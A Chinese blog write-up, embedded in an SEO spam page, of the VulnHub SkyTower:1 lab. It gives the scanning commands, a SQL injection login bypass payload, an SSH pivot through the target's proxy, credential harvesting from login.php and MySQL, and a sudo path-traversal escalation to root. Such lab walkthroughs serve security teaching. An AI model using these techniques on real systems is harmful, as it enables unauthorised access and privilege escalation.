当前位置: 首页 > news >正文

wordpress信息填写seo推广教程seo高级教程

wordpress信息填写,seo推广教程seo高级教程,购物网站功能模块图,上海企业vi设计公司一、安装配置靶机 下载地址: SkyTower: 1 ~ VulnHub 下载之后解压发现是VirtualBox格式的 我们下载一个VirtualBox,这是官网 Downloads – Oracle VirtualBox 安装到默认路径就 打开后点击注册 选择解压后的vbox文件 然后点击左上角管理 点击导出虚拟电脑&…

一、安装配置靶机

下载地址:

SkyTower: 1 ~ VulnHub

下载之后解压发现是VirtualBox格式的

我们下载一个VirtualBox,这是官网

Downloads – Oracle VirtualBox

安装到默认路径就

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步

就得到了一个镜像文件

用vmware打开

默认网卡模式为仅主机,更改为NAT模式

C段扫描获得IP

arp-scan -l

端口扫描一下发现22,80,3128

nmap 192.168.230.128

访问一下80端口

发现一个登录框

发现登录框,我们测sql注入

邮箱随便输入一个,密码我们输入

123' 1=1#

登录成功发现账号密码

想到远程连接22端口

发现无效

想到3128端口尝试挂上代理连接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登录成功

开始提权

sudo -l

发现没有可以提权的

想到了80端口界面存在sql注入

cat /var/www/login.php

发现数据库信息

登录成功

mysql -u root SkyTech -p

查看数据库信息

show databases;

逐个查看找到

use SkyTech;
show tables;

得到账号密码

select * from login

ssh登录

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有权限

pwd

发现在根目录下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密码

远程连接提权成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"

http://www.wangmingla.cn/news/63203.html

相关文章:

  • 网站建设字体变色代码百度排名工具
  • 钦州公司做网站外贸网络推广怎么做
  • 网站app怎么制作如何用google搜索产品关键词
  • 做信息网站要办icp证吗哈市今日头条最新
  • 免费的网站开发平台网站制作方案
  • 怎么建立免费个人网站百度霸屏推广一般多少钱
  • 网站主要内容包括什么网站收录一般多久
  • 做网站最好的语言网络广告的特点
  • 网站url是什么推广方案怎么写
  • 三网获客大数据获客营销软件夫唯seo
  • 数字媒体应用 网站开发nba哈登最新消息
  • 武安网站建设互联网推广的好处
  • 潍坊 网站建设电子商务营销方法
  • 户县做网站百度推广怎么收费标准案例
  • 新闻网网站安全建设网站安全检测
  • 网新企业网站管理系统 破解软文营销文章300字
  • 公司网站建设总结2022年新闻摘抄十条
  • 邢台网站建设免费做网站排名网络宣传推广方案范文
  • phpstudy做正式网站互联网推广销售
  • 优化落实疫情防控措施seo优化关键词分类
  • 协会网站建设的优势线上营销策略都有哪些
  • 网站建设与制作价格西安seo排名公司
  • 内嵌百度新闻网站html源码推广策划
  • 网站制作好以后怎么管理常见的网站推广方法有哪些
  • 企业起名网站怎么做梅花seo 快速排名软件
  • 为什么网站收录下降想要网站推广页
  • 创新的商城网站建江门seo外包公司
  • 做网站可以用思源字体吗百度seo点击
  • 小智logo在线制作济南优化网页
  • 电商网站开发需求文档推广平台排行榜有哪些